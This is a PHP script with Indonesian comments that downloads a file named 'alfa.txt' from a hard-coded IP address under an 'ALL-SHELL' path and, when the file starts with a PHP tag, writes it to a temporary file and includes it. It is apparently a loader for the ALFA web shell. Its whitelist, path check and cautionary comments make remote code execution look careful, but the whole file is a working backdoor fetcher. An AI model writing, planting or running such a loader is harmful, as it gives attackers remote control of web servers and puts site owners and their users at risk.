<?php
// --- Konfigurasi ---
// NOTE: ganti host di whitelist hanya kalau Anda memang mempercayai sumbernya.
$allowed = ['185.128.227.157']; // whitelist host (IP yang Anda minta)
$url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt'; // URL baru
$timeout = 10;

// --- validasi host ---
$host = parse_url($url, PHP_URL_HOST);
if (!in_array($host, $allowed, true)) {
    http_response_code(403);
    exit('Forbidden: host not allowed.');
}

// --- ekstra validasi path (opsional, minimal keamanan) ---
// pastikan path berada di bawah /ALL-SHELL/raw-ker/ untuk mengurangi kemungkinan fetch file lain
$path = parse_url($url, PHP_URL_PATH) ?: '';
if (stripos($path, '/ALL-SHELL/raw-ker/') !== 0) {
    http_response_code(400);
    exit('Bad request: unexpected path.');
}

// --- ambil konten via cURL ---
$ch = curl_init($url);

// jika URL menggunakan http (bukan https) kita tidak bisa verifikasi SSL.
// (lebih aman gunakan HTTPS)
$scheme = parse_url($url, PHP_URL_SCHEME) ?: 'http';
$curl_opts = [
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_TIMEOUT => $timeout,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_USERAGENT => 'Mozilla/5.0 (compatible; FetchBot/1.0)',
];

// jika HTTPS, aktifkan verifikasi; kalau HTTP biarkan default
if (strtolower($scheme) === 'https') {
    $curl_opts[CURLOPT_SSL_VERIFYPEER] = true;
    $curl_opts[CURLOPT_SSL_VERIFYHOST] = 2;
} else {
    // untuk HTTP, tidak ada verifikasi SSL — ini kurang aman
    $curl_opts[CURLOPT_SSL_VERIFYPEER] = false;
    $curl_opts[CURLOPT_SSL_VERIFYHOST] = 0;
}

curl_setopt_array($ch, $curl_opts);

$body = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$ctype = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
$err = curl_error($ch);
curl_close($ch);

if ($body === false || $http_code !== 200) {
    http_response_code(502);
    echo "Bad upstream response. HTTP {$http_code}. cURL error: {$err}";
    exit;
}

// --- bersihkan BOM & whitespace sebelum pemeriksaan ---
function ltrim_utf8_bom($str) {
    if (substr($str, 0, 3) === "\xEF\xBB\xBF") return substr($str, 3);
    return $str;
}
$body_clean = ltrim_utf8_bom($body);
$body_trim = ltrim($body_clean);

// --- jika konten berisi tag PHP di awal, execute (INCLUDE) ---
if (preg_match('/^\s*<\?php/i', $body_trim)) {
    // *** SANGAT PENTING: mengeksekusi kode remote berisiko. Pastikan sumber tepercaya. ***
    // tulis ke file temporer lalu include
    $tmpdir = sys_get_temp_dir();
    $tmpfile = $tmpdir . DIRECTORY_SEPARATOR . 'remote_' . bin2hex(random_bytes(8)) . '.php';

    if (file_put_contents($tmpfile, $body) === false) {
        http_response_code(500);
        exit('Failed to write temporary file.');
    }

    // ubah mode file supaya aman (opsional)
    @chmod($tmpfile, 0600);

    // include dalam scope terbatas
    try {
        include $tmpfile;
    } catch (Throwable $e) {
        // jika PHP < 7 gunakan Exception instead of Throwable
        http_response_code(500);
        echo 'Execution error: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }

    // hapus file temporer
    @unlink($tmpfile);
    exit;
}

// --- kalau bukan PHP, tampilkan sebagai teks aman ---
header('Content-Type: text/html; charset=utf-8');
if (stripos((string)$ctype, 'text/plain') !== false || stripos((string)$ctype, 'text/') === 0) {
    echo nl2br(htmlspecialchars($body, ENT_QUOTES, 'UTF-8'));
} else {
    // fallback: tampil sebagai plain text
    echo nl2br(htmlspecialchars($body, ENT_QUOTES, 'UTF-8'));
}